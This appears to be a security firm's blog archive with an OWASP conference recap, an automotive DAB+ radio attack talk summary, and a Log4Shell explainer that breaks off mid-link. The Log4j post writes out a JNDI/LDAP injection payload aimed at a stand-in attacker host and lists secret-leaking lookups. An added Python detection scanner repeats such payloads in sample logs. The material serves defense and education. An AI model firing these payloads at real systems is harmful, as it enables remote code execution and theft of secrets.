src="https://blogger.googleusercontent.com/img/a/AVvXsEjFLx0cRigZarMDU3cDATxMC-R7AGDiaFphYyupun9tdWOLr2-tIElV-EaI1pNQ05JDy_t87ASsYPXzZmwMCqyIZK37eHnN_QTm8OsknM6ZgEIHuY9ze8QZj9aj_jKtaR0zt2QerKquPHjcEkfwXw7rRt0RhWJBzK_LEv7efkUS10O9WRUmwOBUzv0E1Q" width="320" /></a></div><br />The OWASP Global AppSec Dublin 2023 conference was a truly inspiring event for anyone involved in application security. As an attendee, I was able to catch up with OWASP colleagues and hear from experts on a range of topics. <div>In particular, there were two themes that really stood out to me: <i>worldwide</i> and <i>threat modeling</i>.<br /><h4 style="text-align: left;">OWASP: The Open <u>Worldwide </u>Application Security Project</h4><div style="text-align: left;">During the conference, the OWASP Board made an exciting announcement regarding the meaning of the letter "W" in OWASP. Traditionally, the "W" in OWASP has stood for "Web," reflecting the organization's initial focus on web application security. 
The Board announced they are changing the meaning of the "W" to "Worldwide," reflecting the global nature of the OWASP project and its mission.<br /><br />This change is significant because it recognizes that application security is no longer limited to just web applications. With the proliferation of mobile and IoT devices, cloud computing, and other emerging technologies, application security has become a much broader concern. By changing the meaning of the "W" to "Worldwide," OWASP is acknowledging this reality and expanding its focus to include all types of applications. </div><div style="text-align: left;"> </div><div style="text-align: left;">The change in the meaning of the "W" in OWASP from "Web" to "Worldwide" is a significant development for the organization and the application security community as a whole. It reflects the evolving nature of application security and the importance of the global community in addressing these challenges. I am excited to see how this change will shape the future of OWASP and its mission to make software security visible worldwide.<br /></div><h4 style="text-align: left;"></h4><h4 style="text-align: left;">Threat Modeling</h4><div style="text-align: left;"></div><p>Threat modeling is a structured approach for identifying, quantifying, and addressing the security risks associated with an application. In recent years, there has been a growing interest in this area, and the conference featured a keynote and two talks on the subject.</p>The conference had a keynote, a training session and 2 talks regarding threat modeling. The keynote, “A Taste of Privacy Threat Modeling” by Kim Wuyts, focused on threat modeling privacy. Ms. Wuyts spoke about how to identify potential privacy threats and how to mitigate those risks. She also provided insights into best practices for threat modeling in a privacy context. 
<div style="text-align: left;">Other talks at the event emphasized practical approaches to Threat Modeling that are essential for companies to adopt in order to develop more secure products and services. These presentations provided valuable insights and actionable recommendations that can help organizations improve their security posture and better protect their customers' data and privacy.<br /><br />Threat modeling is not a new concept. In fact, it has been around for quite some time. However, it has only recently gained traction within the application security community. This is likely due to the increasing number of data breaches and cyber attacks that have occurred in recent years. Organizations are now more aware than ever of the need to secure their applications against potential threats.</div><div style="text-align: left;">Since the inception of our company in 2007, we have been advocating for the promotion of Threat Modeling activities. However, it was only in recent years that we have observed a significant increase in interest in this area. 
The growing discourse around Threat Modeling indicates a broader recognition of its importance in ensuring the security of software and systems.<br /><br /><div style="text-align: left;"></div><div style="text-align: left;">More information about threat modeling:</div><div style="text-align: left;"> </div><div style="text-align: left;">- Adam Shostack: <a href="https://shostack.org/books/threat-modeling-book">"Threat Modeling: designing for security"</a><br />- Marco Morana:<a href="https://www.wiley.com/en-us/Risk+Centric+Threat+Modeling%3A+Process+for+Attack+Simulation+and+Threat+Analysis-p-9780470500965"> "Risk Centric Threat Modeling"</a><br />- <a href="https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling">Microsoft TM</a> <br />- <a href="https://mindedsecurity.com/services/consulting/threat-modeling/">IMQ Minded Security Threat Modeling</a></div><div style="text-align: left;"> </div><div style="text-align: left;"><h4 style="text-align: left;">Testability patterns for web applications, a new OWASP Project</h4><div><div><a href="https://testable.eu/" target="_blank">TESTABLE</a> is an EU-funded project under the Horizon 2020 Research and Innovation Actions program, designed to address the significant challenge of building and maintaining secure and privacy-</div><div>friendly modern web-based and AI-powered application software systems.</div><div><br /></div><div>IMQ Minded Security is part of the <a href="https://testable.eu/consortium/" target="_blank">TESTABLE consortium</a> together with CISPA, Eurecom, TUBS, UC3M, SAP SE, ShiftLeft GmbH, NortonLifeLock and Pluribus One.</div><div><br /></div><div>We would like to express our appreciation to Luca Compagna, Senior Scientist and Research Architect at SAP Security Research, for his insightful presentation on a new OWASP project aimed at making our Testability Patterns for Web Applications accessible and improvable by the wider community.</div></div><div style="text-align: left;"><br />During 
the presentation, Luca emphasized the critical role of testability in ensuring the security and privacy of Web Applications, and demonstrated our approach in the context of Static Application Security Testing (SAST). Specifically, we provided concrete examples of SAST testability patterns and how they can hinder the analysis of web application code by state-of-the-art SAST tools.<br /><br />He also showcased our open source framework for implementing these patterns, which enables the evaluation of SAST tools against the testability patterns, highlighting which patterns pose problems for specific tools. Additionally, the framework enables the identification of testability patterns within the source code of web applications, informing developers of areas that may prove challenging for SAST.<br /><br />Towards the end of the presentation, he introduced the three main target audience groups: web developers, SAST tool developers, and security central teams. For each group, we highlighted the value added by these SAST patterns and provided guidance on how they can participate in our project community and contribute to the creation and maturation of testability patterns. Finally, we presented our plan for the OWASP project.<br /><br /></div><div style="text-align: left;">More information regarding TESTABLE:</div></div><div style="text-align: left;"> </div><div style="text-align: left;">- <a href="https://testable.eu/">TESTABLE site</a></div><div style="text-align: left;">- <a href="https://owasp.org/www-project-testability-patterns-for-web-applications/">OWASP Testability Patterns for Web Applications</a></div><div style="text-align: left;"> </div><div style="text-align: left;">You can see all the Conference's videos <a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG8479ud_l4W93WU5MP2bg78">here</a>. 
<br /></div></div><p><br /></p></div>Matteo Meuccihttp://www.blogger.com/profile/14563434479199405929noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-41295196448562362392022-07-28T08:02:00.002-07:002022-07-28T08:03:01.997-07:00UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiudD_Xp3lJCAzIrQrT-FSjXcxXuz72qLmrLHvFKhQhJzoSnmy-gWoWrCt-FNmbbFiylX3byUeWjZuJk7XE41wIFarc3fREroKYz7qMjXC4-l1BQJYbnvSpIUX-5LzdviiunBR1TrfDHRt-qKBvgpJNAHV8KOsUeDJM3M1Me3_ySBLstqadk8_JwyZk" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="271" data-original-width="440" height="197" src="https://blogger.googleusercontent.com/img/a/AVvXsEiudD_Xp3lJCAzIrQrT-FSjXcxXuz72qLmrLHvFKhQhJzoSnmy-gWoWrCt-FNmbbFiylX3byUeWjZuJk7XE41wIFarc3fREroKYz7qMjXC4-l1BQJYbnvSpIUX-5LzdviiunBR1TrfDHRt-qKBvgpJNAHV8KOsUeDJM3M1Me3_ySBLstqadk8_JwyZk" width="320" /></a></div><br />On March the 31st, I gave a <a href="https://italy.vehiclemeetings.com/index.php/conference/program/program-day-2.html" target="_blank">quick talk </a>on automotive security at <a href="https://italy.vehiclemeetings.com/index.php" target="_blank">VTM</a> titled "<b>UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. 
A case study</b>" (<a href="https://mindedsecurity.com/wp-content/uploads/2022/07/DIPAOLA_IMQ_VTM_2022.pdf" target="_blank">slides here</a>).<p></p><p>The idea was to create some content about one of the <i>most hyped topics</i> in the automotive cyber security world over the last year, without keeping it just theoretical: <a href="https://unece.org/transport/documents/2021/03/standards/un-regulation-no-155-cyber-security-and-cyber-security" target="_blank">UN/ECE 155</a> and <a href="https://www.iso.org/standard/70918.html" target="_blank">ISO/SAE 21434</a>.</p><p>Both are concerned with the implementation of a CSMS (Cyber Security Management System), which consists in performing, for each vehicle, several high-level security tasks, such as Threat Analysis and Risk Assessment (TARA), supply chain security issue tracking, implementation of the mitigations, update management and so on.</p><p>The following diagram shows the product development lifecycle model used in the automotive industry, called the <a href="https://en.wikipedia.org/wiki/V-Model">V-Model</a>, and the cybersecurity processes in each phase of the V-Model.</p><p style="text-align: center;"> <img height="249" src="https://lh4.googleusercontent.com/1w47GbhM6KsZeduLejmcHjwimwwNm3cslMo_SDs8cpY3kdkBVpL-r4xQuYk3fTk84PKFWbNoTAig6OzboYlmaO1pPkmeiPekS7eqAA5bwWqluk0Y7bwmAR0VA8K_bqkeqiy6wINWAFjMSMOCy1qZIw=w400-h249" width="400" /></p><p style="text-align: left;">The most interesting point for mitigating risks and performing attack surface analysis is the TARA, which can really help minimize risk at the earliest stage. In particular, it gives its best when the technologies that are going to be implemented <i>are well known from a security perspective</i>. 
</p><p style="text-align: left;">The following figure describes the steps that must be covered to perform a TARA according to ISO 21434:</p><p style="text-align: center;"><span id="docs-internal-guid-ccc7537f-7fff-0fad-52ed-b7e0b6c3584c"><img height="333px;" src="https://lh4.googleusercontent.com/gPxH7kj3KglNrhtMJPwjz7c-9ea3SLTvap2NZHGedi_1_8FDwnnskmdnxK7k6DAvVwz71BHcdGun8RwfQ4XDs3UkJivTRyDwtjSv0HIP012-dexgowspCOIz36rbCfwOs4gb_ZZDIzlRqBo0RxxZlQ" width="376px;" /></span></p><p style="text-align: left;"><br /></p><p style="text-align: left;">Since the audience was expected to be mixed technical/non-technical, I decided to keep it in the middle as well, which, alas, sometimes means the hard way.</p><p>Also, how to go practical without going vehicle specific? mmm, take something that is already on every vehicle and talk about attacks, risks and remediations in the context of UNECE R155 and ISO 21434 requirements.</p><h3 style="text-align: left;"><u><b>Digital Radio Broadcasting!</b></u> </h3><p>Now, the problem is to research those topics without being too obvious and condense it all into a 30-minute slot, which is quite challenging.</p><p>With the goal of identifying some unexplored attack surface, I took a couple of weeks to go into the <a href="http://www.interactive-radio-system.com/docs/EN50067_RDS_Standard.pdf" target="_blank">RDS</a> and <a href="https://www.worlddab.org/dab/technical-specifications">DAB+</a> specifications and <a href="https://www.blackhat.com/presentations/bh-usa-07/Barisani_and_Bianco/Presentation/bh-usa-07-barisani_and_bianco.pdf" target="_blank">their</a> <a href="https://www.bastibl.net/rds-tmc/" target="_blank">previous</a> <a href="https://troopers.de/media/filer_public/18/4f/184fa903-3610-4647-9cb0-bb7644d3f295/broadcasting_your_attack_security_testing_dab_radio_in_cars.pdf" target="_blank">research</a> in the security context. 
</p><p>As briefly described in the slides, at IMQ Minded Security I created a lab testbed with:</p><p></p><ul style="text-align: left;"><li>An <b>RDS transmitter</b> using a Raspberry Pi and this <a href="https://github.com/ChristopheJacquet/PiFmRds" target="_blank">wonderful piece of software</a>.</li><li>Several non-automotive <b>RDS receivers</b> with their software, and a Renault Scenic 2015 head unit with RDS support.</li><li>A <b>DAB+ transmitter</b> using a <i>HackRF One</i>, this essential <a href="https://www.opendigitalradio.org/mmbtools" target="_blank">set of software</a> and this very useful <a href="https://medium.com/@sundayglee/digital-radio-transmission-using-limesdr-and-odr-part-1-b1bcb274d23c" target="_blank">tutorial</a>.</li><li>An <i>RTL-SDR</i> for local tests and a <b>DAB+ USB dongle receiver</b> that is also used in the automotive world with the most used <i>Android Automotive OS</i> software, <a href="https://play.google.com/store/apps/details?id=com.zoulou.dab&hl=it&gl=US">DAB-Z</a>, and several other applications that are mostly used in desktop environments. 
Alas, apart from DAB-Z we had no immediately available automotive head units supporting DAB+ :/.</li></ul><div>The threats were identified after reading the whole RDS and DAB+ documentation and condensed for the talk.</div><div><p>The most interesting turned out to be DAB+ which has much more <a href="https://www.worlddab.org/dab/technical-specifications">perimeter</a>.</p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi-n8WiaoeeYup2cAn9D5z1ZUwBwcli0dbC8qQaoDtXZPkoAwHMa3At73nEvaP6IP5d16Cl1tnxx7pkf4fQw12iOkP7k7scA9Eyiyqvegatq4gsCRAsLwXSavxeftoyVrx_Un5heQT9CyLUq2t60E8EDcof8ospFYCVTcFLYvrZ_FOVgaxn_GWSlpdK" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="522" data-original-width="959" height="217" src="https://blogger.googleusercontent.com/img/a/AVvXsEi-n8WiaoeeYup2cAn9D5z1ZUwBwcli0dbC8qQaoDtXZPkoAwHMa3At73nEvaP6IP5d16Cl1tnxx7pkf4fQw12iOkP7k7scA9Eyiyqvegatq4gsCRAsLwXSavxeftoyVrx_Un5heQT9CyLUq2t60E8EDcof8ospFYCVTcFLYvrZ_FOVgaxn_GWSlpdK=w400-h217" width="400" /></a></p><p>and has already at least one known real <a href="https://www.theregister.com/2022/02/10/mazda_radios_images/" target="_blank">world issue</a>. 
</p></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjVkSxBWvH1pj-pmbH0XkIGw5nhS0BKHC2nIz9t44uDQMv7oS0V-OqtDWLEOwE3-v8LeDnVNuXBUA4BFpXfsIZ_P9wb6mpJpk2zs6zEqT41rI_smiQQkFFhstXueKUGofURZSgMrl1R4xm9jWxfIRuclqjgUIy9pKHO7zxP5qFi7Us7i1csvD-KeJ6S" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="314" data-original-width="745" height="169" src="https://blogger.googleusercontent.com/img/a/AVvXsEjVkSxBWvH1pj-pmbH0XkIGw5nhS0BKHC2nIz9t44uDQMv7oS0V-OqtDWLEOwE3-v8LeDnVNuXBUA4BFpXfsIZ_P9wb6mpJpk2zs6zEqT41rI_smiQQkFFhstXueKUGofURZSgMrl1R4xm9jWxfIRuclqjgUIy9pKHO7zxP5qFi7Us7i1csvD-KeJ6S=w400-h169" width="400" /></a></div><br /><br /></div><div>Next step was to identify a number of possible threats and attacks by studying the DAB+ specifications, a subset of tests was shown during the talk:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEifiUjuR3a6anTy02t3Up95xBVMBt2yqnFAtrXjDsCyuyyCo6ES3-mvRKAvxyhWZA2iTeEUKJ_6Sv9omhQShjUP7OHncVjtP3LcoFsG6Yhyu7piMxmZaaEdoFK8YX9QLx6VTnHAmHMfo-eD0_N13gnXaCVSB9nRg1kdP0aYxDk1mZDmHA7GQn99wn06" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="349" data-original-width="802" height="139" src="https://blogger.googleusercontent.com/img/a/AVvXsEifiUjuR3a6anTy02t3Up95xBVMBt2yqnFAtrXjDsCyuyyCo6ES3-mvRKAvxyhWZA2iTeEUKJ_6Sv9omhQShjUP7OHncVjtP3LcoFsG6Yhyu7piMxmZaaEdoFK8YX9QLx6VTnHAmHMfo-eD0_N13gnXaCVSB9nRg1kdP0aYxDk1mZDmHA7GQn99wn06" width="320" /></a></div><br /></div><div style="text-align: left;">Apart from creating <b>filenames with no extension</b>, we identified several more possible attacks on parsers such as creating malformed unicode filenames, EPG, Journaline and other DAB+ defined formats.</div><div style="text-align: left;">The stumbling blocks when going practical was that some of those formats were not 
implemented by the receivers we tested, so we decided to keep the tests for future activities.</div><h3 style="text-align: left;">Results</h3><div>The most interesting issues were found in DAB+ desktop software, resulting in path traversal and HTML injection.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEir56guXWYS-tzk8SnAHLpMriSsQqtiQVqgjFWVSZyT0_Oi9uqBaSpPqj6YXdiWH-X5LEZaO1xuILvecCQRc04L-5o7RLCtnq0idDPUy6GBeS0E8R7nz9QhUkn1cgeRDthw-Kciw0wDBm01NykOl7PsfJjYkQ2e3ZVOgKvEnBarZvbr_Zd_jDlyZEcj" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="454" data-original-width="915" height="159" src="https://blogger.googleusercontent.com/img/a/AVvXsEir56guXWYS-tzk8SnAHLpMriSsQqtiQVqgjFWVSZyT0_Oi9uqBaSpPqj6YXdiWH-X5LEZaO1xuILvecCQRc04L-5o7RLCtnq0idDPUy6GBeS0E8R7nz9QhUkn1cgeRDthw-Kciw0wDBm01NykOl7PsfJjYkQ2e3ZVOgKvEnBarZvbr_Zd_jDlyZEcj" width="320" /></a></div><br /><br /></div><div><br /></div><div>Unfortunately, the lack of head units or vehicles prevented us from performing more thorough tests to get some more juicy stuff.</div><div>Let's see what the next weeks will give back, since we are expecting new hardware to perform more tests!</div><div><br /></div><div>PS. We were expecting to have a video of the talk to publish, but it's not clear when and if, so here are the slides of the talk:</div><div><a href="https://mindedsecurity.com/wp-content/uploads/2022/07/DIPAOLA_IMQ_VTM_2022.pdf" target="_blank">"<b>UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. 
A case study</b>"</a></div><div><br /></div><div>Feel free to comment or <a href="https://mindedsecurity.com/contact-us/">contact us</a> for any question!</div>Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-20165431623214652192021-12-14T05:47:00.037-08:002021-12-23T06:49:01.391-08:00The Worst Log Injection. Ever. (Log4j [2.0.0-alpha,2.14.1] )<p></p><div class="separator" style="clear: both;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPZ_5pfkS1cqvswDQyDQPApPaJuMKVDynjevtlYpB5lb-d1hGSsI-_XWxLlDnojb1ShTL7q1gwDRLKjVrjet9moWUyVAUCN1UXWIsp-7wFhgHqVd5EeUQ7oPVPwzLRWpK8319Wq5216Q4/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="160" data-original-width="512" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPZ_5pfkS1cqvswDQyDQPApPaJuMKVDynjevtlYpB5lb-d1hGSsI-_XWxLlDnojb1ShTL7q1gwDRLKjVrjet9moWUyVAUCN1UXWIsp-7wFhgHqVd5EeUQ7oPVPwzLRWpK8319Wq5216Q4/" width="320" /></a></div><div style="text-align: left;"><span style="text-align: left;">There has been such a <a href="https://twitter.com/search?q=%23log4shell" target="_blank">hype</a> about the Log4j issue and since <a href="http://mindedsecurity.com/" target="_blank">IMQ Minded Security</a> mission has always been about fixing, this informal post is about </span><i style="text-align: left;">what's going on</i><span style="text-align: left;">, </span><i style="text-align: left;">how to check</i><span style="text-align: left;"> if someone's system is likely affected and </span><i style="text-align: left;">how to fix the issue</i><span style="text-align: left;">.<br /><br /></span></div><div style="text-align: left;"><span style="text-align: left;"><b><u>UPDATE 12-17-2021</u></b>: Since several bypasses to the mitigations </span><span>implemented on version 2.15/16 
were found, <b><u>be sure to update to </u></b></span><b><u>Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later) as described <a href="https://logging.apache.org/log4j/2.x/security.html" target="_blank">here</a> and <a href="https://logging.apache.org/log4j/2.x/" target="_blank">here</a> ASAP!</u></b></div></div><h3 style="text-align: left;"><b>What's the Buzz? (The Problem)</b></h3><div style="text-align: left;">On Thursday 12/09/2021 a <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">vulnerability</a> affecting a very popular logging Java library was published on <a href="https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce" target="_blank">Github</a>. A few hours later the infosec community <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/" target="_blank">was</a> <a href="https://twitter.com/search?q=%23log4shell" target="_blank">on fire</a>.</div><div style="text-align: left;"><br />The issue falls in the category of <i><a href="https://cwe.mitre.org/data/definitions/1336.html" target="_blank">Template Language Injection</a></i>, which involves a parser that is triggered to perform certain actions when particular sequences are found in the parsed string.</div><div style="text-align: left;"><br />The library is <a href="https://logging.apache.org/log4j/2.x/">Log4j</a> and the vulnerable methods (sinks) are the ones that are usually called to actually log messages in files to keep track of events happening during the execution of an application:</div><ul style="text-align: left;"><blockquote><li>log</li><li>fatal</li><li>error</li><li>warn</li><li>trace</li><li>..</li></blockquote></ul><p></p><div style="text-align: left;">(for a more technical code insight <a href="https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/" target="_blank">https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/</a>). 
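<p>Since the sinks above hand the formatted message to Log4j's Interpolator, which expands every <i>${...}</i> sequence it finds (and expands nested sequences innermost-first), a defender's first triage step is to search existing logs, WAF captures or request fields for such sequences. The Python script below is an added example written for this post (it is neither Log4j's code nor a tool from IMQ Minded Security): it unwinds nested lookups before matching, so a literal search for <i>${jndi:</i> is not the only thing it catches, reports the lookup prefixes that reach the network or leak process state, and extracts the host contacted by a JNDI lookup so it can be compared against an IoC list. The log lines, the <i>EVILLDAP.example</i> hostname and the simplified model of what <i>lower</i>/<i>upper</i>/default-value lookups evaluate to are assumptions constructed for the demo.</p>

```python
"""Added example, not from the original post: a defender-side scanner that
finds Log4j lookup sequences ("${...}") in log lines or request fields and
extracts the contacted host for IoC triage.

Log4j's Interpolator expands "${prefix:...}" innermost-first, so a plain
search for the literal "${jndi:" can be evaded by nesting lookups; this
scanner unwinds nested groups before matching. All sample lines are
constructed for the demo; the EVILLDAP.example hostname is a placeholder."""
import re
from typing import List, NamedTuple, Optional

# Lookup prefixes (from the set Log4j enables by default) that either reach
# the network (jndi) or leak process state (env/sys/ctx/web).
ALERT_PREFIXES = {"jndi", "env", "sys", "ctx", "web"}

# A ${...} group whose body contains no further "${" or "}" (innermost group).
INNER = re.compile(r"\$\{([^${}]*)\}")
# jndi:<scheme>://<host>[:port]/...
JNDI_URL = re.compile(r"^jndi:([a-z]+)://([^/:\s]+)(?::(\d+))?", re.IGNORECASE)


class Finding(NamedTuple):
    prefix: str          # lookup prefix that fired, e.g. "jndi" or "env"
    body: str            # unwound lookup body, e.g. "jndi:ldap://host:1389/x"
    host: Optional[str]  # remote host for jndi lookups, None otherwise


def _collapse(body: str) -> str:
    """Approximate what a benign lookup evaluates to so nested evasion unwinds.
    Assumption: only default values (x:-y) and lower/upper are modelled; any
    other body is kept verbatim so it still surfaces in the enclosing group."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return body


def scan_line(line: str, max_groups: int = 50) -> List[Finding]:
    """Return every alert-worthy lookup in `line`, innermost first.
    The loop is bounded so a hostile line cannot keep the scanner busy."""
    findings: List[Finding] = []
    work = line
    for _ in range(max_groups):
        m = INNER.search(work)
        if m is None:
            break
        body = m.group(1)
        prefix = body.partition(":")[0].strip().lower()
        if prefix in ALERT_PREFIXES:
            url = JNDI_URL.match(body)
            findings.append(Finding(prefix, body, url.group(2) if url else None))
            # Keep unwinding: a default value may be part of an outer payload.
            replacement = body.split(":-", 1)[1] if ":-" in body else ""
        else:
            replacement = _collapse(body)
        work = work[:m.start()] + replacement + work[m.end():]
    return findings


def scan_log(lines: List[str]) -> List[tuple]:
    """Return (line_number, Finding) pairs for a batch of log lines."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in scan_line(line)]


# Constructed sample: an access log with two injection attempts (the second
# nests a ${lower:...} lookup, which a literal "${jndi:" search would miss)
# and an application log line carrying an environment-variable lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET / HTTP/1.1" 200 "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:03:12:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://EVILLDAP.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:12:09 +0000] "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://EVILLDAP.example/b}"',
    'app: login failed for user "${env:AWS_SECRET_ACCESS_KEY}"',
]

if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(f"line {n}: {f.prefix} lookup -> {f.body!r} host={f.host}")
```

<p>Run on the constructed sample, lines 2 and 3 both surface as <i>jndi</i> lookups towards EVILLDAP.example and line 4 as an <i>env</i> lookup; a line containing only a harmless <i>${date:...}</i> lookup produces no finding. The point of unwinding rather than grepping is that the scanner sees roughly what the vulnerable Interpolator would see, so the hosts it extracts are the ones the application would actually have contacted.</p>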
</div><div style="text-align: left;"><br /></div><div style="text-align: left;">It means that, if the application wants to log some dynamic content coming from an external source, such as <i>a message about a failed login</i> for a non-existent username, it might call something like:</div><blockquote><p>logger.warn(username + " not found!");</p></blockquote><div style="text-align: left;">If the username value is controlled by a malicious user, it will be possible to exploit the vulnerability and even execute arbitrary code on the affected platform.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">In particular, if an attacker is able to control the log message string, even partially, and can inject the '<b><i>${</i></b>' and '<i><b>}</b></i>' metacharacters, the Log4j <a href="https://github.com/apache/logging-log4j2/blob/master/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java" target="_blank">Interpolator</a> will parse the content and look for <u><a href="https://github.com/apache/logging-log4j2/blob/master/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java#L103" target="_blank">specific patterns</a></u>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">According to the Interpolator class, the <u>following patterns</u> are enabled by default:</div><blockquote><ul><li>log4j</li><li>sys</li><li>env</li><li>main</li><li>marker</li><li>java</li><li>lower</li><li>upper</li><li>date</li><li>ctx</li><li>jndi (if org.apache.logging.log4j.core.lookup.JndiLookup is present)</li><li>web (if org.apache.logging.log4j.web.WebLookup is present)</li><li>docker</li><li>spring</li><li>kubernetes</li></ul></blockquote><p> </p><div style="text-align: left;">So, the real deal is an attack performed via the jndi:ldap keyword (or similar patterns such as RMI, COS, etc.). 
In fact, by injecting something like:</div><p></p><blockquote>${jndi:ldap://EVILLDAP:[PORT]/XX}</blockquote><p></p><p>as the argument of the sink method, Log4j will:</p><p></p><ol style="text-align: left;"><li>trigger a DNS request to resolve the EVILLDAP hostname;</li><li>perform an LDAP request to the (attacker-controlled) LDAP server hosted on the resolved IP;</li><li>the attacker-controlled LDAP server will then be able to reply with a malicious serialized Java object, which will be executed on the Log4j side;</li><li>if the malicious object, by abusing internal features (gadgets), is able to trigger the correct set of instructions, the vulnerability will be successfully exploited.</li></ol><p></p><div style="text-align: left;">As can be noted, <b>this is a two-stage attack: </b>after the vulnerability is triggered, the vulnerable application needs to send a request to the malicious server in order to get the RCE payload.</div><div style="text-align: left;"><br /></div><h3 style="text-align: left;"><b>What's the Impact and How about the Risk? 
(</b><b>The Attack)</b></h3><p>The worst <b>impact</b> is <i><u>Remote Code Execution</u></i>, which requires that:</p><p></p><ol style="text-align: left;"><li><i>the victim machine is able to perform outbound requests; </i></li><li><i>the attacker is able to use the correct gadget chain to successfully perform the attack.</i></li></ol><div> <u>Another important</u> <b>impact</b> is the <u><i>Exfiltration of Confidential Information</i></u> via other patterns such as:</div><div><ul style="text-align: left;"><blockquote><li>env:KEY</li><li>sys:KEY</li><li>ctx:KEY</li><li>web:KEY</li><li>..</li></blockquote></ul></div><div>in conjunction with DNS requests or other layer-7 requests, which requires that:</div><div><ol style="text-align: left;"><li>the victim machine is allowed to perform DNS requests or other outbound requests. </li></ol><div>In this second attack the attacker is able to gather information such as internal cryptographic keys or similar data from application-mapped strings.<br /><br /></div></div><p></p><h3 style="text-align: left;"><b>Which Version is Affected?</b></h3><div style="text-align: left;">All versions of <i>Apache Log4j 2 before 2.15</i> are affected. <br /><br /></div><div style="text-align: left;">In particular: <b>2.0-beta9 <= Apache Log4j <= 2.14.1</b></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><u>Log4j version 1 might be affected in some specific cases if JNDI is enabled, but it is not by default.</u></div><div style="text-align: left;"><u><br /></u></div><div style="text-align: left;"><b>WARNING</b>: there are a bunch of blog posts asserting that <b>some Java versions mitigate</b> the attacks, but that is <b>NOT true</b>.<b> The vulnerability is independent of the Java version.<br /><br /></b></div><h3 style="text-align: left;"><b>Am I Vulnerable? 
(The Check)</b></h3><div style="text-align: left;">There are several ways to check whether any of the deployed applications is vulnerable; the correct answer would be to implement <a href="https://en.wikipedia.org/wiki/Supply_chain_management" target="_blank">Supply Chain Management</a>, but this paragraph is about practical, urgent actions.</div><p>If you've already implemented a process that lets you list:</p><p></p><ul style="text-align: left;"><li>*<b>All</b>* your applications and versions</li><li>*<b>Where</b>* they are deployed</li></ul><div style="text-align: left;">That list is called an <a href="https://en.wikipedia.org/wiki/Software_bill_of_materials" target="_blank">SBOM (Software Bill of Materials)</a>, which lists all the software in use, libraries included, with their versions.<br />If you have it, there are very good chances that the time spent to find and fix everything will be relatively small.</div><div><p>But, of course, having it depends on the maturity of the security process implemented in your company (check <a href="https://mindedsecurity.com/services/consulting/5d-framework/" target="_blank">this</a> out if you're interested in our <a href="https://mindedsecurity.com/our-services/consulting/">services</a>).</p><div style="text-align: left;">Consider an enterprise without an SBOM. It might have hundreds of deployed software packages from external vendors, plus internally developed custom software. 
This means it will require a big investment of time and resources to prioritize and patch.</div><p>If <i><u>no SBOM is in place</u></i>, then the first thing to do is to roll up your sleeves and, <i>for each instance</i>:</p><p></p><blockquote><p></p><ol style="text-align: left;"><li>Log in.</li><li>Check if there are running processes using Java.</li><li>Identify the directories and use the open source <a href="https://github.com/jeremylong/DependencyCheck/releases/" target="_blank">OWASP Dependency Check</a> (or similar products).</li></ol><p></p><p></p></blockquote><div style="text-align: left;"><i>OWASP Dependency Check</i> is able to recursively check for vulnerable libraries in deployed <u>EAR/WAR/JAR</u> applications and also in other files like <i>pom.xml</i>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Finally, have a look at the <a href="https://github.com/curated-intel/Log4Shell-IOCs" target="_blank">Indicators of Compromise</a> list, which might help in case there's already been a security incident.<br /><br /></div><h3 style="text-align: left;">How can I mitigate the risk? (The Fix)</h3></div><div><b>The permanent ones</b>:</div><div><ul style="text-align: left;"><li>For <a href="https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/" target="_blank">each</a> <a href="https://twitter.com/GossiTheDog/status/1470056396968374273/photo/1" target="_blank">affected</a> <a 